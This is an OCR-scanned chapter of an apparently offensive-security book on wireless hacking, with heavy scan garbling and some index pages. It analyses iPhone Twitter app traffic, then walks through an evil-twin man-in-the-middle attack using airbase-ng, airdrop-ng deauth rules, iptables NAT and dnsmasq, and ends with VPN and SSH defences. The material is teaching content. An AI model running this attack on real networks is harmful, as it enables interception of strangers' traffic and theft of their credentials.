apple-iphonesdevKe Kh inAT4nHgOBEH Bd 
| Host: vl.cache7. googlevideo. con | 
R ange: bytes-2555604- 2214 
onnection: close 
ser-Agent: Apple iPhone OS v3.1.2 CoreMedia v1.0.0.7011 
Accept: */* 
Accept-Encoding: identity 


um 206 Eau Content 


| 08 05:19:36 GMT 


[| ontent- gu bytes 2565004-2621439/16602574 


onnection: 5m 


ontent-Disposition: attachment; filename 


3H A E Feb Poe es eee 
: 0-906400 


ok... YT. L6... icL.. M. 


Fin E ny. 8.0; Ta A 
?. 


TE EA TORRURT CNRC CORNERS 


= Bt | nel 7:2: 5831.3 NT NS LG es Boos RS il 


A, End H save as (Print| Entire conversation (21482 bytes) * |O ASCIl O EBCDIC O Hex Dump O C Arrays @ Raw 
B Help 4 Filter Out This Stream 


Another popular social networking site is Twitter. There are several apps available for the 
iPhone that make it much easier to send out your tweets and keep up to date with everyone you're 
following. So we are going to take a look at a couple of different iPhone Twitter apps to find out 
how applications that have the same purpose can reveal very different information in the network 
traffic. We want to see what type of information we can or cannot find. 

The first iPhone Twitter app we are going to take a look at is call Echofon. The next screenshot 
illustrates the network capture for this application. The first thing that we can take note of is 
the face that this app uses port 443 (HTTPS) to secure the network traffic to and from the IP 
168.143.162.109 (Twitter.com). The traffic that is sent in the clear deals with polling the advertis- 
ing server to pull the banner ad that is displayed at the top of the tweets. We can also see that this 
app is identified by the user agent as being named TwitterFon, which is what Echofon was previ- 
ously named. Searching through the traffic did not uncover the name of the Twitter account but 
it was possible to view the links of the profile images for accounts of received tweets. 


Wireless Hacking ™ 379 


iphone-twitter-01-dec.cap - Wireshark 


File Edit view Go Capture Analyze Statistics Help 


SMAAeisexezalirc.e¢ernFt Se «eer x 


- l 
513577 RealiTeeCHK-2. local 
49 18:30:07.528936 RealiTeeCHK-2. local 


51 18:30:07.550441 RealiTeeCHK-2. local 
52 18:30:07.630312 RealiTeeCHK-2. local 
53 18:30:08, 478759 RealiTeeCHK-2. local 


Pa "e AA An AA AP me Nim lI) 


49828 » > https TACK] 

Client Hello 

49830 > https [ACK] Seq-l Ack=1 Win 
Client Hello 


49829 > https [ACK] Seq=75 Ack=947 ! 
49830 > https [ACK] Seq=75 Ack=947 ' 
Standard qu 


v Hypertext Transfer Protocol 
Request Method: GET 


Request Version: HTTP/1.1 
Host: mob,adwhirlcomyrin 


v GET /getInfo,php?appid-ObO421de8fbdlO2cacaeb7ee82c24617&uuid-B80430189FC96EE33537A08F7AC7B3A5&appvers200 HTTP/1.1\r\n 


Request URI: /getInfo.php?appide0bO421de8fbdlO2cacaeb7ee82c24617&uuid-B80430189FC96EE33537A08F7AC7B3AS&appvers200 


Lb 


User-Agent: TwitterFon/315 CFNetwork/459 Darwin/10.0.0d3\r\n 
cept: rw 


Oe 


08 Ol 2c 00 00 22 6b 8c a8 b3 32 
0010 GO 22 6b 8c a8 bl SO fd aa aa 03 60 08 00 
0020 45 00 01 57 6c 2d 40 00 40 06 42 f7 cO a8 32 89 
[0030 ae Bl e8 c9 c2 a3 00 50 SO 67 64 cO 58 c7 e0 30 
040 80 18 80 ae 4d d9 00 00 01 Ol 08 Oa 32 17 bc 93 
050 00 el 45 32 47 45 54 20 2f 67 65 74 49 Ge 66 6f 
[0060 2e 70 68 70 3f 61 70 70 69 64 3d 30 62 30 34 32 


File: "/root/iphone-twitter-01-dec.cap" 777 KB 00:09:05 


CH 


; 1DE2GET Hotini 
‘oho ?aoo id=0b042 


Packets: 1162 Displayed: 1162 Marke... Profile: Default 


The next iPhone Twitter app we want to compare is called TweetDeck. With this app we see 
some of the same results and some different results when compared to the previous app. Again 
we are able to view the links to profile images of tweets received from Twitter.com. From the 
next screenshot we can see that the app is defined in the user agent field as TweetDeck 1.3 and it 
updates its statuses over HTTP and not HTTPS as in the previous app. We can also see that the 
actual username and password credentials are passed in clear text. This can be quickly viewed by 
using the “http.authbasic” display filter in Wireshark. Both frame 941 and frame 943 transmit the 


user’s credentials in the clear. 


iphone-twitter-01-dec.cap - Wireshark 


Ele Edit view Go Capture Analyze Statistics Help 


"Ur. Saxe a' 


[Y] iter: [http. authbasic 


^ € 9 9 FERRA 


GET /statuses/mentions. xml ?count=40: 


* GET /statuses/mentions. xml ?c 


Request Method: GET 


Request URI: /statuses/mentions xml ?count=40&since_id=6067187603 


Request Version: HTTP/1.1 


X-Twitter-Client-Version: 0.1\r\n 
X-Twitter-Client-Url: nil\r\n 
Accept: */*\r\n 

Accept- Language: en- -usA 


0040 EEA 
0050 
0060 
0070 
0080 


lee 


ount=40&since_id=6067187603 HTTP/1.1\r\n 
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Note: In the summer of 2010, Twitter changed the way it allowed authentication to occur. Secure 
authentication is no longer an option; instead it's now mandatory. But this does prove one valid 
point; you can never go under the assumption that anything is secure. 


Example Scenario: "Man in the Middle" 


Bob walks into his local coffee shop, a place he has been many times before. He fires up his lap- 
top and logs into Windows as he sips his latte. His laptop reports that there is wireless Internet 
access in the area via a pop-up in the system tray, so he brings up the wireless manager and 
selects an access point with the coffee shop name and clicks Connect. The laptop connects and 
he brings up his browser, checks his email and begins to surf the web. Moments later his email 
client kicks him out and he is unable to log back in. The web page error says his password is no 
longer valid. Bob sits there very confused not sure what has happened but continues to surf the 
web as he contemplates what just happened. A pretty typical story, really; it happens every day 
in some form or another because these types of attacks are so easy to execute. What happened 
behind the scenes, though, is anything but typical. Bob was a victim of a man-in-the-middle 
attack and had no idea. 

Let's rewind back a bit and look at what really happened. While Bob was ordering his coffee, 
Eve, a local hacker, decided to go out and have some fun. She fired up her laptop and plugged in 
two USB wireless cards, giving her three total, including the one built into her laptop. She starts a 
fake access point program, turning one wireless card into an access point not only with the same 
name as the coffee shop AP, but also with a stronger signal. Next, Eve connects to the real access 
point and bridges the connection to her fake AP. This ensures that anyone who does connect to 
her fake access point will get access to the Internet. With the third wireless card she sets up a cli- 
ent control tool that prevents wireless clients in the area from connecting to the real access point. 
While Bob was surfing the Internet though Eve's rogue access point, Eve was inspecting all of 
Bob's traffic and pulling out the passwords. Once she had his email password she simply logged 
in and changed it to “MITMROCKs!” When Eve had what she wanted, she simply shut down her 
laptop, packed up, and walked out. Bob's laptop quickly reconnected to the real AP and, other 
than a very brief interruption in the connection, Bob was none the wiser and was left scratching 
his head as to what had happened. 

Before we go into a detailed explanation of wireless man-in-the-middle attacks, a few terms 
must be defined. 


m ESSID: Short for extended service set identifier; this is the name of the access point. Several 
common examples of this are MSHOME, Linksys, and Tsunami. It is quite common for 
multiple access points to have the same ESSID. 

m BSSID: Short for basic service set identifier; this is the layer 2 MAC address that the wireless 
card associates with. Each access point will have its own BSSID. 

B MITM: Short for man-in-the-middle attack; an attack where network traffic is passed 
though the attacker's system or program to be read or modified at their choosing. 

B Monitor mode: A state in which a wireless card will receive and allow storage of any 802.11 
packets and store them to a pcap or for use in a program. 

E Injection: A feature of some wireless cards by which they can broadcast packets into the air- 
waves without needing to be attached to an access point. This is useful for spoofing packets. 
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B Deauthentication packet: A 802.11 management packet that causes the client or access point 
to break an authenticated connection. These packets are also referred to as deauth packets. 

B Beacon packet: A packet that is typically sent several times a second advertising a wireless 
network, its ESSID, BSSID, and encryption/service level. 

m BSS: Short for basic service set; an access point and all associated clients are referred to 
as a BSS. 

B ESS: Short for extended service set; a group of access points with the same name covering a 
large area like an entire building. 

B Rogue AP: An access point that is not authorized to be on a given network. 

B Evil twin: An access point that is configured to look just like another legitimate access point. 


The concept of a man-in-the-middle attack is relatively simple, the goal being to place yourself 
in the middle of some sort of conversation or data exchange. This gives you control of what gets 
passed on and in what form or the ability to copy all of the data in transit. From this point on 
we will refer to man-in-the-middle attacks as MITM, which has become an industry-standard 
abbreviation. Wireless networks lend themselves very well to MITM attacks due to the way the 
802.11 protocol is written. The protocol makes it is very hard to determine the access point you 
are connected to. This is because when you tell your wireless card to associate with an ESSID, 
that ESSID could be one of any number of access points connected in a group. Groups of access 
points with the same ESSID are referred to as an ESS. ESSs are used to improve coverage, 
throughput, and the number of clients that can be handled. This becomes a problem because 
the clients must blindly trust the access points. The ESS feature is great from an attacker's 
standpoint because it is very easy to set up an evil twin access point that looks like it belongs to 
a legitimate ESS. 

In a MITM attack you are not really attacking the access point, you are actually attacking the 
client. This is because you want the client to associate to an access point or network under your 
control. There are several ways to do this either via abuse of probe requests, setting up an evil twin 
access point with a stronger signal and hoping that a client will connect, or using targeted deauths 
to give them no choice but to talk to you. 

When it comes to targeting clients for MITM attacks, we need to first understand how the 
clients behave so that you can respond to them and manipulate them into joining the networks 
under your control. Due to their large market share we are going to look at Windows client probe 
request behavior. A probe request is a request that the computer's wireless client sends out for each 
one of the wireless networks it has connected to in the past. These requests not only broadcast the 
network name but ask if this network is around. This behavior opens up an interesting avenue of 
attack for the wireless hacker. By responding to these probe requests it is very easy to convince a 
client to connect to your access point. This changed when Microsoft released KB 917021, which 
was an attempt to make client probe request behavior more secure. This KB has since been rolled 
into Service Pack 3 and works by passively listening for access point beacons, and then responding 
if the access point is in the preferred network list. In this way computers still know what networks 
are around them and can still connect to preferred networks automatically but they aren't quite 
as vulnerable to a simple MITM attack as they were before. Or at least this is how the update was 
supposed to work. When the Microsoft Zero Config client creates a profile it selects the "connect 
even if this network is not broadcasting" check box by default. The following screenshot shows an 
example of a common wireless profile configuration. Here you can see the default settings applied 
by Microsoft. 
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Wireless network properties 


— ————— 


| Network name [SSID Brewsters Coffee 


[v] Connect even if this network is not broadcasting 
Wireless network key 

This network requires a key for the following: 
Network Authentication: | WPA2 

Data encryption: AES 


[C] This is a computerto-computer (ad hoc) network: wireless 
access points are not used 


This check box exists to allow a client to connect to a network that is not sending out beacons. 
This configuration of wireless network is normally called a hidden ESSID. The wireless client 
determines if these networks are around by sending out probe requests and listening to see if the 
network responds. If we couple this with the fact that all Windows wireless profiles are config- 
ured to autoconnect by default, we realize that nothing has changed. Microsoft has rendered this 
update and new client behavior quite ineffective due to default settings and leaves their clients 
open to rogue request attacks. The first public tool using this attack was the Karma tool. It used 
modified Madwifi-ng drivers to create an access point that would respond to all probe requests 
with the correct probe response. In this way the client thought it was talking to a network in its 
preferred network list and would autoconnect. This is very effective at collecting clients. A more 
advanced version of this tool is airbase-ng, part of the aircrack-ng suite. Airbase-ng is a software- 
based approach using a wireless card in monitor mode and packet injection to create an AP that 
will respond to the probe requests. Airbase-ng, while it is easier to use and supports more wireless 
card types, does not work quite as well as Karma due to the fact that it is a software-based AP 
and the timing needed for a robust access point is not quite there. It is still under development 
and should improve in the future. It is important to note that the client behavior is the same for 
Windows Vista and Windows 7 but has changed in regards to probe requests. Profiles that are 
created still have the option to autoconnect and connect to a network if it is not broadcasting; 
however only autoconnect is enabled by default. It should also be noted Microsoft machines are 
not the only clients vulnerable to these attacks. Some older Apple Mac clients as well as many 
modern cell phones will happily send out probe requests looking for the networks to which they 
commonly connect. 

Even though manufactures have made attempts to secure the preferred network lists, it is still 
quite easy to convince clients to connect to a rogue or evil twin access point. This is accomplished 
by setting up an access point with the same name and making sure it is either closer to the clients 
or is putting out a better, cleaner signal then the real access point. Upon noticing a stronger signal, 
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some clients will automatically switch to it while others require a bit more convincing. This works 
because of another feature of wireless clients, the background scan. Even when connected to an 
access point, clients are always searching in the background looking for a better access point. The 
programming logic behind why a client might switch is complicated and depends on many factors; 
because of this there are much easier ways to get a client to connect to you. A common attack is to 
send out a broadcast deauth packet that is spoofed from the access point to all clients telling them to 
disconnect. The hope here is that the clients will disconnect and reconnect to your evil access point. 

Now that we have some basic terms and understand some wireless attacks and client behavior 
defined lets dig in to what really happened in our initial attack scenario. Eve used airbase-ng as 
her evil access-point. Airbase-ng, being a software-based access point, will work with any wireless 
card that supports injection. Eve configured airebase-ng to be an open access point with the same 
name as the coffee shop. The interface attached to this evil software AP we will call mon0. She 
then turned on IP forwarding in her kernel and used iptables to forward all packets coming from 
her access point out another wireless interface, wlan0. She then connects wlan0 to the coffee shop's 
access point. With the IP forwarding set up, she has effectively extended the coffee shop's network 
with her computer. To provide DNS and DHCP, she configures dnsmasq. At this point, any client 
that connects to the evil access point will get all packets forwarded back to the legitimate access 
point so it will receive an IP address and be able to access the Internet normally. However, their 
Internet connection might be a little slower. 

Once she had her network set up it was time to collect more clients. A few clients had con- 
nected on their own but Eve wanted them all. She decided to use airdrop-ng, a wireless deauth tool 
that allows rules. She configured a rule to allow her laptop to connect to the coffee shop's access 
point. She then configured a rule to allow any wireless client to attach to her evil access point. 
Lastly she configured a rule to deny any client access to the legitimate coffee shop access point. 
When she started airdrop-ng on interface monl it created deauth packets based on the rules and 
kicked every one off the legitimate AP except for her. It is important to note that normal wireless 
client behavior is to blacklist an access point that has sent the client several deauth packets. 'This 
behavior helps an attacker with a rogue AP because it will ensure that the client stops trying to 
associate with the legitimate access point and instead uses the attacker's AP. 

Once the real access point has been blacklisted the client will not try to autoconnect to it 
and will search for another access point of the same name. In this case it happens to be Eve's evil 
access point. Eve leaves airdrop-ng running in the background to control the wireless clients and 
continue to ensure they can only connect to her access point. The last step Eve takes is to start 
ettercap, an MITM tool mostly used for ARP spoofing MITM attacks, but that also has some very 
good password parsing. She sets it up to sniff all the traffic from the clients and, as clients connect 
and access items on the Internet, the passwords simply show up in ettercap's logs. Once Eve finds 
Bob's password, she simply logs into his account and changes the password. Bob is none the wiser 
to the ongoing attack as the network continues to look perfectly normal to him. 

Now that we have a high-level view of Eve's attack on Bob, let's walk though and set up the 
attack ourselves. Note that to perform some of these attacks you must be familiar with Linux and 
have a Linux computer and at least two wireless cards that support monitor mode and injection. 
A third card can be used to connect back to the real access point but any sort of wide area network 
(WAN) connection will suffice, such as a cell card or a Ethernet connection. You will also need 
the aircrack-ng suite of tools and all of its required dependencies. 

To perform the MITM attack described above that is performed by Eve, you need three wire- 
less cards with at least two of them capable of injection. Here we can see three cards: wlan0, wlanl, 
and wlan2. Cards wlan! and wlan2 are wireless chipsets capable of injection. 
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Terminal - rootG Pent. : ome/thex1le 


RTS thr:off Fragment thr:off 


Then you need to place the two cards capable of injection into monitor mode. In the case of 
this text I used the aircrack-ng airmon-ng script. The command to do this is 


B airmon-ng start wlanl 
B airmon-ng start wlan2 


This creates two new interfaces, mon0 and monl. Interface monO is the monitor interface for 
wlanl and interface monl is the monitor interface for wlan2. 


Terminal - root@Pentoo:/home/thex1le o 2£20%x% 
File Edit View Terminal Go Help 


Next, we need to find your target client and its association to an access point so we know which 
AP to attack. We can do this using airodump-ng: airodump-ng -w MITM monl. A quick explana- 
tion of the flags used on the airodump-ng command: “-w name” allows the user to specify the name 


Wireless Hacking @ 385 


of the file that airodump-ng writes its logs to. We will need the CSV log file for the airdrop-ng tool. 
Opening the log file, we can see that our target, the Brewsters Coffee access point, has a BSSID of 
00:0F:66:8E:GF:CC. We can also see an attached client with a MAC address of 00:18:DE:09:18:F4. 


vy Terminal - rootGPentoo:/home/thex1le 42OX 


File Edit View Terminal Go Help 


> ][ 2010-10-12 00:25 


Once we know the target we can create the airdrop-ng rules to force the client to attach to 
our rogue access point. The first rule is to allow any client to attach to our rogue access point: 
a/78:44:76:7 D:GF:DA |any. The next rule is to allow only our internal wireless card, wlan0, to 
attach to the target access point. This is so we can provide the hijacked client Internet access and 
not require a separate connection to the Internet: 


a/00:0F:66:8E:6F:CC|00:22:FA:62:86:80 


The last rule causes all other clients on the target access point of 00:0F:66:8E:6F to be sent 
deauth/disassociate packets. 


Terminal - rootàPentoo:/home/thex1le/src/aircrack-ng-src/scripts/airdrop-ng 42e«O0X 


The next step is to start up airbase-ng and configure it to look like the target access point: 


airbase-ng -c 1 mon0 --essid “Brewsters Coffee" 
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A quick explanation of the flags used on the airbase-ng command: -c is the channel to run 
the access point on and mon0 configures airebase-ng to start the access point on the same 
interface it is monitoring for packets. When running, and before a client connects, airbase-ng 


looks like this: 


Terminal - root@Pentoo:/home/thex1le 
File Edit View Terminal Go Help 


yirt 


Then we need to run the following script, which configures our laptop to set up DNS/DHCP 
and forward the traffic back to the real access point. This is done using iptables and packet for- 
warding in the kernel. There are a few key lines in this script you should understand. First we 
need to turn on packet forwarding in the kernel; this allows the attacking computer to act like 
a router: 


echo 1 > /proc/sys/net/ipv4/ip_forward. 

The next step is to is to clear out all settings in iptables with the following commands: 
iptables --flush 

iptables --table nat --flush 


iptables --delete-chain 
iptables --table nat --delete-chain 


After the tables are cleared out, we can configure iptables to forward packets from our rogue access 
point back to the real access point. These commands set up network address translation (NAT) 
between our interfaces. 


B iptables -P FORWARD ACCEPT 
E iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE 


A quick note on the last command, wlan0 is the interface we want to use as our WAN interface; 
in our case wlanO is connected back to the access point we are going to spoof with our rogue AP. 

After that, we need to provide an IP address to the at0 interface. This interface will be created 
by airbase-ng when it is run. This interface will be used for all clients that connect to our rogue 
access point. Lastly, we need to create a dnsmasq configuration file. The following echo command 
gives dnsmasq the IP address range to use as well as a lease time: 


B echo “dhcp-range=192.168.20.50,192.168.20.100,12h” > dnsmasq.conf 
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In our case 12 hours is used. The following command starts dnsmasq with the config file we 
created: 


/usr/sbin/dnsmasq -C dnsmasq.conf -i at0 -8 /home/thex1le/dnsmasq.log 


The -c option starts it listening on interface at0 with the -i flag and creates a logfile in our home 
directory with the -8 flag. Note that your directory paths may vary. 


Terminal - root@Pentoo:/home/thex1le 
File Edit View Terminal Go Help 


.20.50,19 


jnsmasq. conf 


DHCP on até 


Finally, we start airdrop-ng using 

airdrop-ng -i mon] -r rule.txt -t /home/thex1le/MITM-01.csv 
This will force the client to connect to our rogue access point and give us control of all of their 
traffic. The airdrop-ng flags are as follows: -i is the interface with which to inject packets, -r is the 


text file from which to read the deauth rules, and -t is the airodump-ng CSV file that airdrop-ng 
parses to determine what packets to generate. 


Terminal - thexilegPentoo: ~/src/aircrack-ng-src/scripts/airdrop-ng 
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After 30 to 60 seconds, if we performed the MITM attack correctly, we should see our target 
client now attached to our rogue access point. 


Terminal - root @Pentoo:/home/thex1le 2 [a] x 


File Edit View Terminal Go Help 


As we can see in the previous screenshot, the target client with a MAC of 00:18:DE:09:18:F4 is 
now attached to our rogue access point, BSSID 78:44:76:7D:6F:DA. We can also see wlan0 with 
a MAC of 00:22:FA:62:86:80, connected to the real access point, BSSID 00:0F:66:8E:6F:CC. At 
this point it should be abundantly clear just how easy and dangerous MITM attacks are. Now 
that all traffic is routed though the attacker’s PC, anything can be done with it. We can sniff 
passwords, change text on web pages, or redirect DNS entries. The only limit to what you can do 
is your imagination. 


Summary 


As we can see from the different things we discussed in this chapter, not only can computer sys- 
tems be affected by using Wi-Fi, but any other device can be targeted and exploited just as easy. 
From the examples that have been discussed in this chapter, we can see how some of the traffic cap- 
tured can provide very useful and possibly vital information to the potential hacker. For example, 
some of the seemingly useless information can be used to craft spear phishing emails at a directed 
target. If the hacker learns that a particular software package is used, then a simple email crafted 
with an exploit could be sent to that user. Another possibility is the hacker could search for recent 
exploits for that software or app. 

Depending on the types of protocols and applications used, it may be necessary to figure out 
how a particular application communicates to fully understand the data. In this chapter we have 
been conducting the analysis with the network protocol analyzer Wireshark. Although it’s a great 
application for conducting this type of analysis, it's recommended that other tools are tried also. 
Very often different utilities will be able to identify information or files that other applications may 
have missed. There are both free and commercial software applications available. Some other free 
utilities worth trying are Network Miner and Netwitness. 

Also, it’s always very important to stay conscious about what network you're communicating 
on and who may be watching. High-power directional antennas can make it possible to sniff Wi-Fi 
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traffic from a great distance. Fortunately, there are a couple of things that can be done to make it 
a little harder for the hacker, although they are not necessarily “mom compatible.” By that I mean, 
would I be able to get my mom to do this successfully? Probably not, but then again, this book 
isn't designed for moms either. The primary technique I like to use is to use tunneling with either a 
virtual private network (VPN) or secure shell (SSH). A VPN solution may have an associated cost. 
The SSH solution can be totally done by only using free software. SSH can be done primarily in 
two different ways. One, create an SSH tunnel to a known network and tunnel your browser traf 
fic through the tunnel. This has the advantage of being fast, but the DNS and other requests will 
still be sent outside the tunnel, meaning the hacker can see where you're going, just not what you're 
seeing. Second, use the SSH tunnel and forward port 3389 (terminal services) to make a terminal 
services connection to a known system on the known network and use that system’s browser and 
apps. This has the advantage of being more secure since all network traffic is happening from the 
remote system. The downside could be the speed and responsiveness since terminal services will 
have to refresh the screen. This setup is outside the scope of this chapter, but you could get started 
by looking at www.no-ip.com (preferred over www.dyndns.org since it doesn’t encapsulate the traf- 
fic with extra HTML), freeSSHd, and Putty. 
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Versions, identifying, 224 

Video Download Helper, 164-166 

Virtual machine (VM), 96—99, 230, 253 
Virtual private network (VPN), 126—128, 183 
VM, see Virtual machine 
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VPN, see Virtual private network 
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WebDAV DLL hijacker, 283-287 
Web proxies, 121, 122 
WEP, see Wired equivalent privacy 
whoami, 26, 279 
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Wi-Fi 
device identification, 370—371 
hardware, 360—361 
monitoring and capturing, 366-370 
network analysis 
data-text-lines, 373—374 
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Export Selected Bytes, 375 
Google, 377 
iPhone Twitter app, 377—379 
TCP Stream, 376 
TweetDeck, 379 
WireShark protocol, 373—375 
software, 360—361 
Wifi hex, 83 
Wi-Fi protected access (WPA), 205 
Wi-Fi protected access pre-shared key (WPA-PSK) 
cracking, 362—366 
rainbow tables, 371—373 
Windows attack machine, installing Metasploit 
on, 282 
Windows binary executables, 211 
Windows fdisk program, 105 
WindowsGate utility, 26—29 
Windows hibernation file, 345 
Windows operating system 
defending against physical attacks on, 31-32 
BitLocker hacks, 33—39 
drive partitioning for BitLocker, 32-33 
Evil Maid program, 43—45 
TPM, 33-39 
TrueCrypt, 39—42 
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log in without knowing the password, 21—24 
Bart’s PE, 26-29 
using Kon-Boot, 24-26 
WindowsGate utility, 26-29 
physical access 
Live CDs, 3-6 
before you start, 6-8 
Windows 2000 server family domain 
controllers, 30—31 
Windows signatures, 211 
Wine, 231—232 
Winrar, 157, 160—162 
wins.fun, 257 
Wired equivalent privacy (WEP), 205, 
365—366, 367 
Wireshark 
filtering data in, 215 
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operators, 216 


setting up, 214 
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WorldIP Firefox plug-in, 129 
WPA-PSK, see Wi-Fi protected access pre-shared key 
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